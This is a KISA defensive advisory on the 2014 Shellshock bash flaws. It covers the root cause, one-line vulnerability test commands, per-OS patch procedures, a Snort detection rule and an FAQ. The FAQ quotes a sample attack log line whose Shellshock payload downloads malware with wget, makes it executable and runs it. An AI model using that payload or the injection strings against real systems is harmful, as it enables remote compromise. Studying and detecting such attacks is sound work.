원격명령실행취약점대응방안권고 ( 금 ) / KISA 취약점분석팀 ( 화 ) 취약점분석및확인방법, 공격유형, FAQ 추가 개요 년 월 일 에의해발견된 의취약점내용이공개됨 쉘 (Shell) : 사용자가입력한문장을해석하여시스템기능을수행하는

Similar documents
긴급송부 보안경고 코드인젝션 취약점관련금융회사자체점검및패치적용권고 보안서비스본부민상식팀장, 조병열인턴 / 개요 코드인젝션취약점이발견됨 에따라조속한 조치가요구되므로이를전파함 위험도및긴급도 구분 위험도 긴급도 등급 상 상 취약점내용 명령인젝션취약점 일

리눅스 취약점대응방안권고 / KISA 취약점점검팀 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE 지정, 도메인네임을

10월-민재원,손기종.indd

YUM(Yellowdog Updater,Modified) : RPM 패키지가저장된서버 ( 저장소 ) 로부터원하는패키지를자동으로설치한다. : YUM 도구는 RPM 의패키지의존성문제를해결

Server Agent Guide

취약점 대응방안권고 ( 월 ) / KISA 취약점분석팀 ( 수 ) OpenSSL 취약점 FAQ 추가 개요 통신구간암호화를위해많이사용하는 라이브러리에서서버에저장된중요메모리데이터가노출되는 라고명명된심각한버그가발견되어시스템및소프트웨어에대한신속한취약

PowerPoint 프레젠테이션

Adobe Flash 취약점 분석 (CVE )

PowerPoint Template

소프트웨어설치 1. 소프트웨어설치및제거 ( 소스코드 ) 소스코드컴파일을이용한 S/W 설치 1. 소스코드다운로드 - 예 ) httpd tar.gz - 압축해제 : #tar xzvf httpd tar.gz - INSTALL 또는 README파일참조

Windows 8에서 BioStar 1 설치하기

게시판 스팸 실시간 차단 시스템

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

Infrastructure Monitoring Agent install Guide 이문서는와탭 APM 서비스사용자가에이전트설치를돕기위해작성된문서입니다. 이문서는와탭랩스의고유한자산으로재배포또는사용을위해서는 와탭랩스 에연락주시기바랍니다.

untitled

Snort Install Manual Ad2m VMware libnet tar.gz DebianOS libpcap tar.gz Putty snort tar.gz WinSCP snort rules 1. 첫번째로네트워크설정 1) ifconf

/chroot/lib/ /chroot/etc/

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

01Àå

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

을풀면된다. 2. JDK 설치 JDK 는 Sun Developer Network 의 Java( 혹은 에서 Download > JavaSE 에서 JDK 6 Update xx 를선택하면설치파일을

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

10 강. 쉘스크립트 l 쉘스크립트 Ÿ 쉘은명령어들을연속적으로실행하는인터프리터환경을제공 Ÿ 쉘스크립트는제어문과변수선언등이가능하며프로그래밍언어와유사 Ÿ 프로그래밍언어와스크립트언어 -프로그래밍언어를사용하는경우소스코드를컴파일하여실행가능한파일로만들어야함 -일반적으로실행파일은다

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

The Pocket Guide to TCP/IP Sockets: C Version

Contributors: Myung Su Seok and SeokJae Yoo Last Update: 09/25/ Introduction 2015년 8월현재전자기학분야에서가장많이쓰이고있는 simulation software는다음과같은알고리즘을사용하고있다.

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

강의 자료

1. 안드로이드개발환경설정 안드로이드개발을위해선툴체인을비롯한다양한소프트웨어패키지가필요합니다 툴체인 (Cross-Compiler) 설치 안드로이드 2.2 프로요부터는소스에기본툴체인이 prebuilt 라는이름으로포함되어있지만, 리눅스 나부트로더 (U-boot)

PowerPoint 프레젠테이션

CVE Analysis

문서 대제목

비디오 / 그래픽 아답터 네트워크 만약에 ArcGolbe를 사용하는 경우, 추가적인 디스크 공간 필요. ArcGlobe는 캐시파일을 생성하여 사용 24 비트 그래픽 가속기 Oepn GL 2.0 이상을 지원하는 비디오카드 최소 64 MB 이고 256 MB 이상을 메모리

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

PowerPoint 프레젠테이션

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

chap 5: Trees

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월

Observational Determinism for Concurrent Program Security

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다

28 THE ASIAN JOURNAL OF TEX [2] ko.tex [5]

SBR-100S User Manual

untitled

PowerPoint 프레젠테이션

ActFax 4.31 Local Privilege Escalation Exploit

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

로거 자료실

<31332DB9E9C6AEB7A2C7D8C5B72D3131C0E528BACEB7CF292E687770>

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

벤처연구사업(전동휠체어) 평가

슬라이드 1

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

*2008년1월호진짜

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월

What is Unix? A multi-task and multi-user Operating System Developed in 1969 at AT&T s Bell Labs by Ken Thompson (Unix) Dennis Ritchie (C) Douglas Mcl

<322EBCF8C8AF28BFACBDC0B9AEC1A6292E687770>

단계

Chapter 4. LISTS

고급 프로그래밍 설계

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

DBMS & SQL Server Installation Database Laboratory

Mango-IMX6Q mfgtool을 이용한 이미지 Write하기

INDEX 1. 개요 데이터백업스크립트작성 crontab 을이용한자동백업예약 활용 - 다른서버에백업하기

PowerPoint 프레젠테이션

Microsoft PowerPoint - 02_Installation

A Hierarchical Approach to Interactive Motion Editing for Human-like Figures

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

Secure Programming Lecture1 : Introduction

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

Install stm32cubemx and st-link utility

자동화 툴 검토 보고서

Cubase AI installation guide

PowerPoint 프레젠테이션

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo

3장

1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder Service - efolder

사용자계정관리 1. 사용자계정관리 사용자 (user), 그룹 (group) u 다중사용자시스템 (Multi-User System) - 1 대의시스템을동시에여러사람이접속하여쓸수있게하는시스템 u 사용자 (user) - 시스템관리자 : root (=Super user) -

ICAS CADWorx SPLM License 평가판설치가이드

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

[ 마이크로프로세서 1] 2 주차 3 차시. 포인터와구조체 2 주차 3 차시포인터와구조체 학습목표 1. C 언어에서가장어려운포인터와구조체를설명할수있다. 2. Call By Value 와 Call By Reference 를구분할수있다. 학습내용 1 : 함수 (Functi

System Recovery 사용자 매뉴얼

목차 백업 계정 서비스 이용 안내...3 * 권장 백업 정책...3 * 넷하드(100G 백업) 계정 서버로 백업하는 2가지 방법...3 * 백업서버 이용시 주의사항...3 WINDOWS 서버 사용자를 위한 백업서비스 이용 방법 네트워크 드라이브에 접속하여

Mango220 Android How to compile and Transfer image to Target

vRealize Automation용 VMware Remote Console - VMware

Transcription:

원격명령실행취약점대응방안권고 14. 09. 26( 금 ) / KISA 취약점분석팀 14. 09. 30( 화 ) 취약점분석및확인방법, 공격유형, FAQ 추가 개요 년 월 일 에의해발견된 의취약점내용이공개됨 쉘 (Shell) : 사용자가입력한문장을해석하여시스템기능을수행하는명령어해석기 쉘이환경변수를처리하는과정에서취약점이발생하여공격자는시스템의보안을우회하여쉘명령어를실행할수있음 https://bugzilla.redhat.com/show_bug.cgi?id=cve-2014-6271 패치가공개되었으나구글의 가트위터를통해패치가우회가능하다는문제점을제기하여새로운패치를개발하여배포 https://twitter.com/taviso/status/514887394294652929 http://www.openwall.com/lists/oss-security/2014/09/25/10 계속해서 와관련된추가적인보안취약점들이발견되고있음 취약점상세분석 CVE-2014-6271 원격명령실행 CVE-2014-7169 함수선언문파싱에러 CVE-2014-7186 잘못된메모리접근 CVE-2014-7187 잘못된메모리접근 CVE-2014-6277 함수선언문파싱에러 <GNU Bash 취약점요약 > - 1 -

쉘은프로세스환경을이용하여다른쉘인스턴스에환경변수뿐만아니라쉘함수를선언하는기능을제공 함수는 문자열을사용해서환경변수에선언가능하나 함수선언문끝에서처리를멈추지않고계속진행하여쉘명령어를실행 CVE-2014-6271 번호할당 는 파일내에정의되어있는 함수를통해명령어를처리하여실행 함수는전달된명령어문자열의끝까지처리하기위해반복문 사용 int parse_and_execute (string, from_file, flags) {... while (*(bash_input.location.string)) {... 반복문내에서현재처리하는명령어문자열이함수선언문인지 확인하고처리를종료하는코드가없음 - 2 -

따라서함수선언문을처리하고난뒤에도반복문을계속실행하며 뒤에삽입된명령어를실행 if (parse_command () == 0) { if ((flags & SEVAL_PARSEONLY) (interactive_shell == 0 && read_but_dont_execute)) { last_result = EXECUTION_SUCCESS; dispose_command (global_command); global_command = (COMMAND *)NULL; } else if (command = global_command) { // 함수선언명령어인지확인하지않음 struct fd_bitmap *bitmap;... 패치된 버전에서는환경변수처리시에함수선언문인지확인하고 명령어처리횟수 반복문횟수 를 회로제한하여 호출../bash-4.3-patched/variables.c /* Don't import function names that are invalid identifiers from the environment, though we still allow them to be defined as shell variables. */ if (legal_identifier (name)) parse_and_execute(temp_string, name, SEVAL_NONINT SEVAL_NOHIST SEVAL_FUNCDEF SEVAL_ONECMD); 구글의 에의해 패치를적용해도 함수선언문처리과정에여전히문제점이있다고밝혀짐 - 3 -

함수선언문처리과정에서특수한문자를대입할경우 올바르지 않은 문자가저장되어의도치않은명령실행가능 http://ftp.kaist.ac.kr/gnu/gnu/bash/bash-4.3-patches/bash43-026 에의해발견되었으며 개이상의리다이렉트명령문을처리할경우 또는특수한반복문처리과정에서잘못된메모리접근이발생 http://www.openwall.com/lists/oss-security/2014/09/25/13 구글의 에의해발견되었으며 과유사하게함수선언문처리과정에서취약점이존재 http://lcamtuf.blogspot.kr/2014/09/bash-bug-apply-unofficial-patch-now.htm 할당되지않은메모리에접근을시도하여공격자가제어가능한포인터주소로값을쓰거나읽을수있음 공격유형 현재 취약점을악용한공격이탐지되고있으며 다양한 공격명령어들이존재 < 리버스쉘연결 > - 4 -

< 악성코드다운로드 > < 시스템상태확인 > < 패스워드파일탈취 > < 웹쉘생성 > < 시스템강제재시작 > < 파일삭제 > - 5 -

< 디렉토리삭제 > < 메일발송 > < 시스템슬립 > 영향받는버전 및이전버전 예 ) rpm q bash, dpkg -s bash grep Version 모든 버전이취약점에영향을받으며 업데이트된후버전이바뀌지않는일부운영체제도있으니취약점확인방법으로패치검증권고 - 6 -

취약점확인방법 를사용하는시스템에서터미널프로그램실행후아래명령어들을입력 확인 env x='() { :;}; echo vulnerable' bash -c "echo this is a test" <CVE-2014-6271 에취약한 Bash 화면 > <CVE-2014-6271 에취약하지않은 Bash 화면 > 확인 env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo <CVE-2014-7169 에취약한 Bash 화면 > <CVE-2014-7169 에취약하지않은 Bash 화면 > - 7 -

확인 bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' echo "CVE-2014-7186 vulnerable, redir_stack" <CVE-2014-7186 에취약한 Bash 화면 > <CVE-2014-7186 에취약하지않은 Bash 화면 > 확인 (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) bash echo "CVE-2014-7187 vulnerable, word_lineno" <CVE-2014-7187 에취약한 Bash 화면 > <CVE-2014-7187 에취약하지않은 Bash 화면 > - 8 -

확인 foo='() { echo not patched; }' bash -c foo <CVE-2014-6277 에취약한 Bash 화면 > <CVE-2014-6277 에취약하지않은 Bash 화면 > 해결방법 업데이트버전설치 취약한 버전을사용하고있는경우 운영체제제조사홈페이지를방문하여패치방법확인 CentOS http://centosnow.blogspot.kr/2014/09/critical-bash-updates-for-centos-5.html Redhat https:/rhn.redhat.com/erata/rhsa-2014-1306.html Ubuntu http://www.ubuntu.com/usn/usn-2364-1/ Fedora http://fedoramagazine.org/updated-bash-packages-now-available-via-fedo ra-updates/ Solaris https://support.oracle.com/rs?type=doc&id=1930090.1 Suse http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00042.html Arch https://lists.archlinux.org/pipermail/arch-security/2014-september/000099.html Mac OS X http://support.apple.com/kb/dl1769 http://support.apple.com/kb/dl1768 http://support.apple.com/kb/dl1767-9 -

패키지업데이트방법 OS 종류 업데이트방법 yum clean all && yum update bash CentOS RHN 업데이트문제로해결이되지않을경우 cd /etc/yum.repos.d vi rhel-debuginfo.repo를통해아래와같은내용으로대체 name=centos-$releasever - Updates baseurl=http://mirror.centos.org/centos/5/updates/$basearch/ gpgcheck=1 <rhel-debuginfo.repo 파일내용변경 > Redhat 대체후, 사용할버전맞게명령어입력 rpm import http://mirror.centos.org/centos/ ( 버전에따라입력 ) (ex : rpm import http://mirror.centos.org/centos/5/os/x86_64/rpm-gpg-key-centos-5) yum update bash Ubuntu sudo apt-get update sudo apt-get install --only-upgrade bash (1) 페도라 21 알파 su -c "yum -y install koji" koji download-build --arch=$(uname -m) bash-4.3.25-2.fc21 su -c "yum localinstall bash-4.3.25-2.fc21.$(uname m).rpm" Fedora (2) 페도라 20 su -c "yum -y install koji" koji download-build --arch=$(uname -m) bash-4.2.48-2.fc20 su -c "yum localinstall bash-4.2.48-2.fc20.$(uname -m).rpm" debian (3) 페도라 19 su -c "yum -y install koji" koji download-build --arch=$(uname -m) bash-4.2.48-2.fc19 su -c "yum localinstall bash-4.2.48-2.fc19.$(uname -m).rpm" (1) Debian 6 (Squeeze) sudo apt-get update sudo apt-get install bash - 10 -

(2) Debian 7 (Wheezy) sudo vim /etc/apt/sources.list를통해아래와같은내용작성 deb http://http.debian.net/debian/ squeeze main contrib non-free deb-src http://http.debian.net/debian/ squeeze main contrib non-free deb http://security.debian.org/ squeeze/updates main contrib non-free deb-src http://security.debian.org/ squeeze/updates main contrib non-free deb http://http.debian.net/debian squeeze-lts main contrib non-free deb-src http://http.debian.net/debian squeeze-lts main contrib non-free <sources.list 파일내용변경 > sudo apt-get update sudo apt-get install bash Solaris 패치파일다운로드 (https://support.oracle.com/rs?type=doc&id=1930090.1) patchadd < 패치경로 > (1) Enterprise Software Development Kit 11 SP3 zypper in -t patch sdksp3-bash-9780 (2) Enterprise Server 11 SP3 for VMware zypper in -t patch slessp3-bash-9780 SUSE (3) Enterprise Server 11 SP3 zypper in -t patch slessp3-bash-9780 (4) Enterprise Server 11 SP2 LTSS zypper in -t patch slessp2-bash-9781 (5) Enterprise Server 11 SP1 LTSS zypper in -t patch slessp1-bash-9782 (6) Enterprise Desktop 11 SP3 zypper in -t patch sledsp3-bash-9780 Arch Mac OS X pacman Syu http://support.apple.com/kb/dl1769 http://support.apple.com/kb/dl1768 http://support.apple.com/kb/dl1767 운영체제버전에알맞은 DMG 파일을다운받아설치 - 11 -

를사용하지않는경우서비스중지또는삭제 서비스의사용유무를확인하여해당서비스를사용하지않을 경우에는서비스를중지시키거나 를삭제조치 네트워크탐지룰설정 공격에사용되는문구 가네트워크패킷으로서버에수신될경우 등의보안장비에서탐지또는차단하는룰설정을통해방어 alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: Volex Possible CVE-2014-6271 bash Vulnerability Requested (header) ; flow:established,to_server; content: () { ; http_header; threshold:type limit, track by_src, count 1, seconds 120; sid:2014092401;) 출처 : http://www.volexity.com/blog/?p=19 공식 Snort 룰다운로드주소 https://www.snort.org/downloads 기술상담 성명 연락처 메일주소 손기종 02-405-5223 skj@kisa.or.kr 김민수 02-405-5476 gredmoon@kisa.or.kr 업데이트이력 날짜 업데이트내용 2014.09.26 최초공개 2014.09.30 추가확인된취약점내용, 취약점확인방법, 공격유형, FAQ - 12 -

붙임 취약점 Gnu bash 취약점 (ShellShock) 대응 FAQ Q1. 시스템에서 Gnu bash 의버전정보를어떻게확인할수있나요? 대상시스템의터미널에접속하셔서아래의명령어를입력하여버전을확인하실수있습니다. - rpm 형태로설치한경우 # rpm q bash - 패키지 (dpkg) 형태로설치한경우 # dpkg -s bash grep Version Q2. 보안패치가정상적으로설치가되었는지어떻게확인할수있나요? 터미널에접속한후아래의명령어 2개를각각실행하여 vulnerable 이라는메시지가출력되지않을경우보안패치가완료된것입니다. - CVE-2014-6271와 CVE-2014-7169 취약점의패치여부확인명령어 # env x='() { :;}; echo vulnerable' bash -c "echo this is a test # env x='() { (a)=>\' /bin/bash -c "echo echo vulnerable"; cat echo Q3. 보안패치를적용한후서버재부팅이필요하나요? 시스템을재부팅하지않아도보안패치가적용되나필요한경우취약점확인방법 (Q3) 을참고하여 패치적용여부를확인하실수있습니다. Q4. 소스코드형태로된보안패치파일은어디에서받아볼수있나요? 각벤더별홈페이지에서보안패치를제공하지않는 OS 를사용하는경우 Gnu 공식사이트에 방문하여최신패치파일을다운로드받아설치할수있습니다. - 다운로드링크 : https://ftp.gnu.org/gnu/bash/ Q5. 인터넷을통한외부에서의공격은 CGI 를이용하는서비스만가능한가요? - 13 -

CGI 는 HTTP_USER_AGENT 와같이헤더정보를웹서버의환경변수에저장하는대표적인경우로, CGI 와같이헤더정보가환경변수에저장되고 Bash 쉘을사용하는환경은취약점에노출될수 있습니다. Q6. 솔라리스를사용하고있습니다. 보안패치를적용해야하나요? 솔라리스 8,9,10,11 버전을사용할경우 Bash 취약점 (ShellShock) 의영향을받으며, 아래의제조사 홈페이지에방문하여패치파일을다운로드한후최신업데이트를적용할수있습니다. - https://support.oracle.com/rs?type=doc&id=1930090.1 - patchadd /path/to/patchdir Q7. Bash 쉘을시스템에서사용하지않을경우파일을삭제해도되나요? Bash 파일을삭제할경우운영중인서비스에영향을줄수있으므로시스템장애에대비하여 원본파일 ( 예 : /bin/bash) 을별도로백업하고영향도를검토하여삭제하도록권고합니다. Q8. apt-get 또는 yum 을이용한자동업데이트가되지않을경우어떻게해야하나요? apt-get, yum 을통한자동업데이트는인터넷에연결하여업데이트파일을받아오기때문에 먼저업데이트대상서버가인터넷에연결되어있는지확인하신후업데이트를적용하시기 바랍니다. 인터넷에연결되지않은서버의경우 rpm 등의패키지를다운받을수있는사이트에접속하여 패치파일을다운로드하여로컬시스템에설치할수있습니다. (Q9 참고 ) Q9. 인터넷이되지않는내부에서운영하는서버는어떻게보안패치를수행할수있나요? 업데이트대상시스템이인터넷에연결되어있지않아 apt-get, yum 을통한자동업데이트를 수행할수없을경우 Gnu bash 의최신패치파일을별도의인터넷이연결된곳에서다운로드 한후로컬시스템에업로드하여수동으로보안패치를적용할수있습니다. Gnu bash 의 RPM 다운로드사이트 - https://access.redhat.com/articles/11258 (Manually selecting updates from the Red Hat Network) - 14 -

- http://mirror.centos.org/centos/ - http://rpmfind.net/linux/rpm2html/search.php?query=bash&submit=search+... Q10. 네트워크보안장비에서 Gnu bash 취약점공격을어떻게차단할수있나요? 외부공격자가 Gnu bash 취약점을이용하여공격 ( 스캔등 ) 을수행하는경우아래와같은내용이 웹로그에기록됩니다. - 웹로그에기록된공격패턴문자열 -> () { 192.168.1.1 - - [26/Sep/2014:10:30:00 +0000] "GET /index.cgi HTTP/1.0" 200 349 "() { :; }; wget -O /tmp/malware http://192.168.1.1/malware; chmod 777 /tmp/malware; /tmp/malware;" 네트워크보안장비운영자는해당공격패턴문자열인 () { 를침입탐지시스템또는침입방어시스템을이용하여외부에서유입되는 Gnu bash 취약점공격을탐지및차단하실수있습니다. [Snort 보안정책예제 ] alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: Volex Possible CVE-2014-6271 bash Vulnerability Requested (header) ; flow:established,to_server; content: () { ; http_header; threshold:type limit, track by_src, count 1, seconds 120; sid:2014092401;) Q. 각각의 OS에서수동업데이트하는방법이있나요? Redhat 수동업데이트설치방법 1. 아래의레드햇로그인 ( 계정이있어야함 ) 2. On the Subscriptions Classic Management Registered Systems page, 업데이트할사이트선택 3. Software 탭클릭 4. Errata 탭클릭 5. 적용을원하는 Errata 선택 6. 페이지의오른쪽아래의 Apply Errata 선택 7. # rhn_check https://www.redhat.com/wapps/sso/login.html?redirect=http%3a%2f%2faccess.redhat.com%2fmanagement (Rhel6버전 64bit용다운로드주소 ) CentOS 수동업데이트설치방법 1. 해당패키지수동다운로드 http://rpmfind.net//linux/rpm/centos/updates/5.10/i386/rpms/bash-3.2-33.el5.1.i386.html - 15 -

Q. OS 별현재 Bash Patch 최신버전은? 운영체제 Fedora CentOS Ubuntu opensese Debian Solaris Redhat Mac OSX (Fedora 19) bash-4.2.48-2.fc19 (Fedora 20) bash-4.2.48-2.fc20 (Fedora 21) bash-4.3.25-2.fc21 (CentOS 5) bash-3.2-3 3.el5_10.4 (CentOS 6) bash-4.1.2-15.el6_5.2 (CentOS 7) bash-4.2.45-5.el7_0.4 ( U b u n t u 10.04 LTS) 4.1-2ubuntu3.4 ( U b u n t u 12.04 LTS) 4.2-2ubuntu2.5 ( U b u n t u 14.04 LTS) 4.3-7ubuntu1.4 (SuSE11) 3.2-147.2 0.1 (SuSE10) 3.1-24.32.1 (squeeze (lts)) 4.1-3+deb6u2 https://co mmunity.or (wheezy(security)) acle.com/ 4.2+dfsg-0.1+ message/1 deb7u3 2652718#1 2652718 4.3-9.2 (sid) https://rhn. redhat.co m/errata/r HSA-2014-1306.html OS X b a s h Update 1.0 (OS X Lion) (OS X Mountain Lion) (OS X Mavericks) http://d.hatena.ne.jp/kango/20140925/1411612246 최신확인필요 - 16 -